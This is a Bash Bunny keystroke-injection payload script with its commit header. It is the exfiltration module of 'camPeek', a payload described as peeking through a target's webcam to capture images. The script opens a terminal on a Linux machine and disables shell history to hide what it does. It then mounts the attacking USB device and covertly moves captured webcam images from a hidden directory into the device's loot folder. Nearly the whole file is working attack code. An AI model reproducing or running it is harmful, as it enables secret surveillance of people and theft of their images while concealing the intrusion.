drapl0n 7bd90b7308
uploaded camPeek (#508)
* uploaded camPeek

camPeek payload peeks through targets web cam and capture images

* Delete payload.txt

* uploading payload
2022-04-01 11:05:39 -05:00

44 lines
951 B
Plaintext

# Title: camPeek
# Description: camPeek payload's exfilteration module to move captured images to bunny.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Execution
# Target: GNU/Linux operating systems with systemd.
# Attackmodes: HID, Storage.
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
# create directory named camPeek in /loot/
Q STRING mv /var/tmp/.system/sysLog/* '$mntt'/loot/camPeek/ \&
Q ENTER
Q STRING disown \&\& exit
Q ENTER